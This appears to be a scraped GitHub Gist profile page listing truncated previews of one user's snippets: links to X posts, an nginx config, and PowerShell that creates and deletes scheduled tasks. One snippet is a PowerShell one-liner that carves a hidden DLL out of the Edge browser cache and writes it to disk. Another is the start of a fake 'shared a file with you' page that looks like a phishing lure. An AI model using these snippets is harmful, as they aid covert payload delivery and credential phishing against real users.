Skip to content

Instantly share code, notes, and snippets.

View justaguywhocodes's full-sized avatar

Toussaint Louverture justaguywhocodes

View GitHub Profile
https://x.com/thebabylonbee/status/1981492100668473805?s=46
https://x.com/Fullcourtpass/status/1980771059768136093
$d="$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Cache\Cache_Data"; gci $d -File | % { $f=$_.FullName; try { $b=[IO.File]::ReadAllBytes($f); $s=[Text.Encoding]::Default.GetString($b); if ($s -match '(?s)(?<=INDLL)(.*?)(?=OUTDLL)') { [IO.File]::WriteAllBytes("$d\hello.dll", [Text.Encoding]::Default.GetBytes($matches[1])) } } catch { } }
user www-data;
worker_processes auto;
worker_cpu_affinity auto;
pid /run/nginx.pid;
error_log /var/log/nginx/error.log;
include /etc/nginx/modules-enabled/*.conf;
events {
https://x.com/nba/status/1975723582769799594?s=46
<!DOCTYPE html>
<head>
<title>mr.d0x shared a file with you</title>
<style>
body {
background-color: #f2f2f2;
font-family: 'Segoe UI', sans-serif;
margin: 0;
padding: 40px 0;
display: flex;
https://x.com/EricLDaugh/status/1971579179293434025
# Create a COM object for the Task Scheduler service
$service = New-Object -ComObject Schedule.Service
# Connect to the local Task Scheduler service
$service.Connect()
# Get the root task folder
$rootFolder = $service.GetFolder("\")
# Delete the task
https://x.com/jk_rowling/status/1966256971134234678
https://x.com/pureMetatron/status/1966553419998457990
# Create a COM object for the Task Scheduler service
$service = New-Object -ComObject Schedule.Service
# Connect to the local Task Scheduler service
$service.Connect()
# Get the root task folder
$rootFolder = $service.GetFolder("\")
# Create a new task definition